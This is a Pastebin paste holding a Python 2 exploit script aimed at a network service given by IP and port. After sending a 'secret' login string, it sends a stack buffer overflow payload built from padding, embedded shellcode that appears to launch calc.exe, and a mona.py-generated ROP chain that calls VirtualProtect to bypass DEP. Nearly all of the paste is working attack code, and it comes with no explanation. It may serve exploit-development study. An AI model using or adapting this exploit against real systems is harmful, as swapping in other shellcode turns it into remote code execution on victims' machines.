API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 22nd, 2019
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.93 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. import socket, sys, struct
  4. # bp 40190c recv
  5. # bp 401912 after recv
  6. def create_rop_chain():
  7. # rop chain generated with mona.py - www.corelan.be
  8. rop_gadgets = [
  9. 0x777d83e4, # POP EAX # RETN [RPCRT4.dll]
  10. 0x779f3030, # ptr to &VirtualProtect() [IAT bcryptPrimitives.dll]
  11. 0x7776f046, # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll]
  12. 0x76073a50, # XCHG EAX,ESI # RETN [KERNELBASE.dll]
  13. 0x77b646a5, # POP EBP # RETN [ntdll.dll]
  14. 0x760b9ef3, # & jmp esp [KERNELBASE.dll]
  15. 0x77bde810, # POP EBX # RETN [ntdll.dll]
  16. 0x000004B0, # 0x000004B0-> ebx
  17. 0x77b628ac, # POP EDX # RETN [ntdll.dll]
  18. 0x00000040, # 0x00000040-> edx
  19. 0x77bcd8ad, # POP ECX # RETN [ntdll.dll]
  20. 0x76120532, # &Writable location [KERNELBASE.dll]
  21. 0x743bb3b2, # POP EDI # RETN [SspiCli.dll]
  22. 0x77132d41, # RETN (ROP NOP) [KERNEL32.DLL]
  23. 0x7606d63c, # POP EAX # RETN [KERNELBASE.dll]
  24. 0x90909090, # nop
  25. 0x761ff729, # PUSHAD # RETN [sechost.dll]
  26. 0x760b9ef3,
  27. ]
  28. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  29. # edi rop nop
  30. # esi virtualprotect
  31. # ebp jmp esp
  32. # esp lpAddress
  33. # ebx dwSize
  34. # edx flNewProtect
  35. # ecx lpflOldProtect
  36. # eax 90909090
  37. shellcode="\xE8\x00\x00\x00\x00\x5A\x8D\x52\xFB\x89\xE5\x81\xEC\x00\x10\x00\x00\x52\xBB\x8E\xFE\x1F\x4B\xE8\x28\x00\x00\x00\x5A\x55\x52\x89\xC5\x8D\xB2\xE1\x00\x00\x00\x8D\xBA\xE9\x00\x00\x00\xE8\x48\x00\x00\x00\x5A\x5D\x31\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x54\xFF\xD0\xFC\x31\xFF\x64\x8B\x3D\x30\x00\x00\x00\x8B\x7F\x0C\x8B\x7F\x14\x8B\x77\x28\x31\xD2\x66\xAD\x84\xC0\x74\x11\x3C\x41\x72\x06\x3C\x5A\x77\x02\x0C\x20\xC1\xC2\x07\x30\xC2\xEB\xE9\x39\xDA\x8B\x47\x10\x8B\x3F\x75\xDB\xC3\x89\xEA\x03\x52\x3C\x8B\x52\x78\x01\xEA\x8B\x5A\x20\x01\xEB\x31\xC9\x57\x56\x8B\x36\x31\xC9\x8B\x3B\x01\xEF\x52\x31\xD2\xC1\xC2\x07\x32\x17\x47\x80\x3F\x00\x75\xF5\x92\x5A\x39\xF0\x74\x0C\x83\xC3\x04\x41\x39\x4A\x18\x75\xDF\x5E\x5F\xC3\x5E\x5F\xAD\x56\x53\x89\xEB\x89\xDE\x03\x5A\x24\x8D\x04\x4B\x0F\xB7\x00\x8D\x04\x86\x03\x42\x1C\x8B\x00\x01\xF0\xAB\x5B\x5E\x83\xC3\x04\x41\x81\x3E\xFF\xFF\x00\x00\x75\xAB\xC3\xAD\x6D\xBF\xE8\xFF\xFF\x00\x00\x01\x00\x00\x00";
  38.  
  39. if len(sys.argv) != 3:
  40. print "supply IP PORT"
  41. sys.exit(-1)
  42.  
  43. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  44. sock.connect( (sys.argv[1], int(sys.argv[2])) )
  45.  
  46. ###send
  47. message = "secret\n\x00"
  48. sock.sendall(message)
  49.  
  50. ###recieve
  51. data = sock.recv(10000)
  52. print data
  53.  
  54. ###send
  55. rop_chain = create_rop_chain()
  56. #breakpoint="\xcc"
  57. ret_addr_s=struct.pack('L', 0x746b5b5b)
  58. pad="B"*400
  59. nops_len = 1040 - len(shellcode)
  60.  
  61. exploit = "A" * nops_len
  62. exploit += shellcode
  63. exploit += rop_chain
  64.  
  65. #print("NOPS=%d, shellcode=%d, rop=%d, ret_addr=%s\n" % (nops_len, len(shellcode), len(pad), ret_addr_s ) )
  66. print("Sending %d bytes" %(len(exploit)))
  67.  
  68. sock.sendall(exploit)
  69.  
  70. ###recieve
  71. data = sock.recv(10000)
  72. print data
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!